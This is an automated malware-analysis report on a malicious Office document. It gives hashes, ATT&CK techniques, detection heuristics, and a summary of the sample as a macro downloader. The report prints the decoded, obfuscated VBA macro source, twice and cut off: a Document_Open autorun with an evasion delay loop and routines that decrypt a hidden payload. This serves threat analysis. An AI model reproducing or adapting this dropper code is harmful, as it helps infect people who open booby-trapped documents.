Office (OLE) malware analysis — malicious · 27010cddeb2f44c1

MALICIOUS

Office (OLE)

86.0 KB Created: 2016-06-20 19:00:00 First seen: 2019-04-18

MD5: 97fd2667ed84a0ee4d8ad67ce6cde3b0 SHA-1: 036804a315a9160c1d6c45dc1d66d947565672ef SHA-256: 27010cddeb2f44c19138da5e5de616b1d6b9138aeffaace043ea2dda6b03745b

242 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is triggered upon opening, and it uses a Shell() call to execute arbitrary code. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', which is a common social engineering tactic to bypass macro security. The VBA script itself is heavily obfuscated but its execution via Shell() and the presence of a 'Doc.Downloader' ClamAV signature strongly indicate it's a downloader.

Heuristics 7

ClamAV: Doc.Downloader.Macrobe-9761291-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macrobe-9761291-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40991 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40991 bytes
SHA-256: `4603e9e7a8ec13a28f83e3ef55806936f962b5eb257e0f50334def88ab595fca`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim ERHDyA() As Integer Dim I0o5K(16544 - 7544) As Long, Y6Yb(8650 + 1349) As Long Private Function VIx1(XE21h() As Byte) As String Dim Yi1CkRG As Long For Yi1CkRG = 0 To VV5DKvw(XE21h) VIx1 = VIx1 & ROg(XE21h(Yi1CkRG)) Next Yi1CkRG End Function Private Function Fd0WS(Sw05 As Integer) As Byte() Dim Ixs(1) As Byte, R3VSq As Long, HQe8sx As Byte For R3VSq = 0 To 1 Ixs(R3VSq) = (Int(Sw05 / (2 ^ ((4547 - 4539) * (1 - R3VSq))))) And (-7488 + 7743) Next R3VSq ReDim Fd0WS(1) As Byte For R3VSq = 0 To 1 \ 2 HQe8sx = Ixs(R3VSq) Ixs(R3VSq) = Ixs(1 - R3VSq) Ixs(1 - R3VSq) = HQe8sx Next Fd0WS = Ixs End Function Private Sub dOCumeNt_oPen() On Error Resume Next Dim F3b As Long, JVBC As Long, MjX4 As Long F3b = 91267 For JVBC = 1 To F3b MjX4 = MjX4 + 1 Next JVBC If MjX4 = F3b Then Dim Ph31Uf As Integer, Xw9aL As String For Ph31Uf = 9 To 544 Xw9aL = Xw9aL + Ph31Uf Next JW Else LXok End If End Sub Private Function OmuyRL(ByVal PAgiZ8 As String, ByVal MwLqfvz As Long, ByVal KB As Variant) As String Dim D9w1cj() As Byte, FBYZ2L() As Byte, QSw As Long, SaQ As Long D9w1cj = PAgiZ8 QSw = VV5DKvw(D9w1cj) MwLqfvz = (MwLqfvz - 1) * 2 KB = (KB * 2) - 1 If MwLqfvz + KB > QSw Then KB = QSw - MwLqfvz ReDim FBYZ2L(KB) For SaQ = MwLqfvz To MwLqfvz + KB FBYZ2L(SaQ - MwLqfvz) = D9w1cj(SaQ) Next SaQ OmuyRL = FBYZ2L End Function Private Function YbA(BlUNeVf, A1SoxK) YbA = BlUNeVf - (A1SoxK * (BlUNeVf \ A1SoxK)) End Function Private Function W20X(GWka, Khb2) W20X = (GWka And Not Khb2) Or (Not GWka And Khb2) End Function Private Sub JW() Dim RLl() As String, EQ As Integer RLl = Split(UserForm1.Label1.Caption, ROg((5308 - 5264))) ReDim ERHDyA(1981) For EQ = 0 To 1981 ERHDyA(EQ) = RLl(EQ) Next EQ Dim XpO As String, El3MsB As Long, Jr As String, MYg As String, K9O0XX As String, K4N2 As String, OH As String, GE As String, GK2G() As Byte Dim EC(10) As Byte, Fakuwy(32) As Byte EC(0) = 233 EC(1) = 20 EC(2) = 247 EC(3) = 138 EC(4) = 194 EC(5) = 229 EC(6) = 237 EC(7) = 42 EC(8) = 8 EC(9) = 85 EC(10) = 194 Fakuwy(0) = 82 Fakuwy(1) = 89 Fakuwy(2) = 102 Fakuwy(3) = 67 Fakuwy(4) = 122 Fakuwy(5) = 70 Fakuwy(6) = 79 Fakuwy(7) = 107 Fakuwy(8) = 119 Fakuwy(9) = 105 Fakuwy(10) = 50 Fakuwy(11) = 122 Fakuwy(12) = 98 For El3MsB = VV5DKvw(I0o5K) To VV5DKvw(Y6Yb) Fakuwy(13) = GJvr9hf(El3MsB, 1) Fakuwy(14) = GJvr9hf(El3MsB, 2) Fakuwy(15) = GJvr9hf(El3MsB, 3) Fakuwy(16) = GJvr9hf(El3MsB, 4) Fakuwy(17) = Fakuwy(13) Fakuwy(18) = Fakuwy(14) Fakuwy(19) = Fakuwy(15) Fakuwy(20) = Fakuwy(16) Fakuwy(21) = Fakuwy(13) Fakuwy(22) = Fakuwy(14) Fakuwy(23) = Fakuwy(15) Fakuwy(24) = Fakuwy(16) Fakuwy(25) = Fakuwy(13) Fakuwy(26) = Fakuwy(14) Fakuwy(27) = Fakuwy(15) Fakuwy(28) = Fakuwy(16) Fakuwy(29) = Fakuwy(13) Fakuwy(30) = Fakuwy(14) Fakuwy(31) = Fakuwy(15) Fakuwy(32) = Fakuwy(16) If D9v4O(EC, Fakuwy) = "EloZVCCdMcm" Then Exit For Next El3MsB Dim PT1OE(11) As Byte, HcNSMZ(31) As Byte PT1OE(0) = 248 PT1OE(1) = 161 PT1OE(2) = 170 PT1OE(3) = 35 PT1OE(4) = 120 PT1OE(5) = 31 PT1OE(6) = 65 PT1OE(7) = 127 PT1OE(8) = 7 PT1OE(9) = 172 PT1OE(10) = 244 PT1OE(11) = 4 HcNSMZ(0) = 66 HcNSMZ(1) = 113 HcNSMZ(2) = 104 HcNSMZ(3) = 82 HcNSMZ(4) = 55 HcNSMZ(5) = 73 HcNSMZ(6) = 88 HcNSMZ(7) = 87 HcNSMZ(8) = 50 HcNSMZ(9) = 66 HcNSMZ(10) = 97 HcNSMZ(11) = 99 For El3MsB = VV5DKvw(I0o5K) To VV5DKvw(Y6Yb) HcNSMZ(12) = GJvr9hf(El3MsB, 1) HcNSMZ(13) = GJvr9hf(El3MsB, 2) HcNSMZ(14) = GJvr9hf(El3MsB, 3) HcNSMZ(15) = GJvr9hf(El3MsB, 4) HcNSMZ(16) = HcNSMZ(12) HcNSMZ(17) = HcNSMZ(13) HcNSMZ(18) = HcNSMZ(14) HcNSMZ(19) = HcNSMZ(15) HcNSMZ(20) = HcNSMZ(12) HcNSMZ(21) = HcNSMZ(13) HcNSMZ(22) = HcNSMZ(14) HcNSMZ(23) = HcNSMZ(15) HcNSMZ(24) = HcNSMZ(12) HcNSMZ(25) = HcNSMZ(13) HcNSMZ(26) = HcNSMZ(14) H ... (truncated)

SHA-256: 4603e9e7a8ec13a28f83e3ef55806936f962b5eb257e0f50334def88ab595fca

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim ERHDyA() As Integer
Dim I0o5K(16544 - 7544) As Long, Y6Yb(8650 + 1349) As Long
Private Function VIx1(XE21h() As Byte) As String
Dim Yi1CkRG As Long
For Yi1CkRG = 0 To VV5DKvw(XE21h)
VIx1 = VIx1 & ROg(XE21h(Yi1CkRG))
Next Yi1CkRG
End Function
Private Function Fd0WS(Sw05 As Integer) As Byte()
Dim Ixs(1) As Byte, R3VSq As Long, HQe8sx As Byte
For R3VSq = 0 To 1
Ixs(R3VSq) = (Int(Sw05 / (2 ^ ((4547 - 4539) * (1 - R3VSq))))) And (-7488 + 7743)
Next R3VSq
ReDim Fd0WS(1) As Byte
For R3VSq = 0 To 1 \ 2
HQe8sx = Ixs(R3VSq)
Ixs(R3VSq) = Ixs(1 - R3VSq)
Ixs(1 - R3VSq) = HQe8sx
Next
Fd0WS = Ixs
End Function
Private Sub dOCumeNt_oPen()
On Error Resume Next
Dim F3b As Long, JVBC As Long, MjX4 As Long
F3b = 91267
For JVBC = 1 To F3b
MjX4 = MjX4 + 1
Next JVBC
If MjX4 = F3b Then
Dim Ph31Uf As Integer, Xw9aL As String
For Ph31Uf = 9 To 544
Xw9aL = Xw9aL + Ph31Uf
Next
JW
Else
LXok
End If
End Sub
Private Function OmuyRL(ByVal PAgiZ8 As String, ByVal MwLqfvz As Long, ByVal KB As Variant) As String
Dim D9w1cj() As Byte, FBYZ2L() As Byte, QSw As Long, SaQ As Long
D9w1cj = PAgiZ8
QSw = VV5DKvw(D9w1cj)
MwLqfvz = (MwLqfvz - 1) * 2
KB = (KB * 2) - 1
If MwLqfvz + KB > QSw Then KB = QSw - MwLqfvz
ReDim FBYZ2L(KB)
For SaQ = MwLqfvz To MwLqfvz + KB
FBYZ2L(SaQ - MwLqfvz) = D9w1cj(SaQ)
Next SaQ
OmuyRL = FBYZ2L
End Function
Private Function YbA(BlUNeVf, A1SoxK)
YbA = BlUNeVf - (A1SoxK * (BlUNeVf \ A1SoxK))
End Function
Private Function W20X(GWka, Khb2)
W20X = (GWka And Not Khb2) Or (Not GWka And Khb2)
End Function
Private Sub JW()
Dim RLl() As String, EQ As Integer
RLl = Split(UserForm1.Label1.Caption, ROg((5308 - 5264)))
ReDim ERHDyA(1981)
For EQ = 0 To 1981
ERHDyA(EQ) = RLl(EQ)
Next EQ
Dim XpO As String, El3MsB As Long, Jr As String, MYg As String, K9O0XX As String, K4N2 As String, OH As String, GE As String, GK2G() As Byte
Dim EC(10) As Byte, Fakuwy(32) As Byte
EC(0) = 233
EC(1) = 20
EC(2) = 247
EC(3) = 138
EC(4) = 194
EC(5) = 229
EC(6) = 237
EC(7) = 42
EC(8) = 8
EC(9) = 85
EC(10) = 194
Fakuwy(0) = 82
Fakuwy(1) = 89
Fakuwy(2) = 102
Fakuwy(3) = 67
Fakuwy(4) = 122
Fakuwy(5) = 70
Fakuwy(6) = 79
Fakuwy(7) = 107
Fakuwy(8) = 119
Fakuwy(9) = 105
Fakuwy(10) = 50
Fakuwy(11) = 122
Fakuwy(12) = 98
For El3MsB = VV5DKvw(I0o5K) To VV5DKvw(Y6Yb)
Fakuwy(13) = GJvr9hf(El3MsB, 1)
Fakuwy(14) = GJvr9hf(El3MsB, 2)
Fakuwy(15) = GJvr9hf(El3MsB, 3)
Fakuwy(16) = GJvr9hf(El3MsB, 4)
Fakuwy(17) = Fakuwy(13)
Fakuwy(18) = Fakuwy(14)
Fakuwy(19) = Fakuwy(15)
Fakuwy(20) = Fakuwy(16)
Fakuwy(21) = Fakuwy(13)
Fakuwy(22) = Fakuwy(14)
Fakuwy(23) = Fakuwy(15)
Fakuwy(24) = Fakuwy(16)
Fakuwy(25) = Fakuwy(13)
Fakuwy(26) = Fakuwy(14)
Fakuwy(27) = Fakuwy(15)
Fakuwy(28) = Fakuwy(16)
Fakuwy(29) = Fakuwy(13)
Fakuwy(30) = Fakuwy(14)
Fakuwy(31) = Fakuwy(15)
Fakuwy(32) = Fakuwy(16)
If D9v4O(EC, Fakuwy) = "EloZVCCdMcm" Then Exit For
Next El3MsB
Dim PT1OE(11) As Byte, HcNSMZ(31) As Byte
PT1OE(0) = 248
PT1OE(1) = 161
PT1OE(2) = 170
PT1OE(3) = 35
PT1OE(4) = 120
PT1OE(5) = 31
PT1OE(6) = 65
PT1OE(7) = 127
PT1OE(8) = 7
PT1OE(9) = 172
PT1OE(10) = 244
PT1OE(11) = 4
HcNSMZ(0) = 66
HcNSMZ(1) = 113
HcNSMZ(2) = 104
HcNSMZ(3) = 82
HcNSMZ(4) = 55
HcNSMZ(5) = 73
HcNSMZ(6) = 88
HcNSMZ(7) = 87
HcNSMZ(8) = 50
HcNSMZ(9) = 66
HcNSMZ(10) = 97
HcNSMZ(11) = 99
For El3MsB = VV5DKvw(I0o5K) To VV5DKvw(Y6Yb)
HcNSMZ(12) = GJvr9hf(El3MsB, 1)
HcNSMZ(13) = GJvr9hf(El3MsB, 2)
HcNSMZ(14) = GJvr9hf(El3MsB, 3)
HcNSMZ(15) = GJvr9hf(El3MsB, 4)
HcNSMZ(16) = HcNSMZ(12)
HcNSMZ(17) = HcNSMZ(13)
HcNSMZ(18) = HcNSMZ(14)
HcNSMZ(19) = HcNSMZ(15)
HcNSMZ(20) = HcNSMZ(12)
HcNSMZ(21) = HcNSMZ(13)
HcNSMZ(22) = HcNSMZ(14)
HcNSMZ(23) = HcNSMZ(15)
HcNSMZ(24) = HcNSMZ(12)
HcNSMZ(25) = HcNSMZ(13)
HcNSMZ(26) = HcNSMZ(14)
H
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.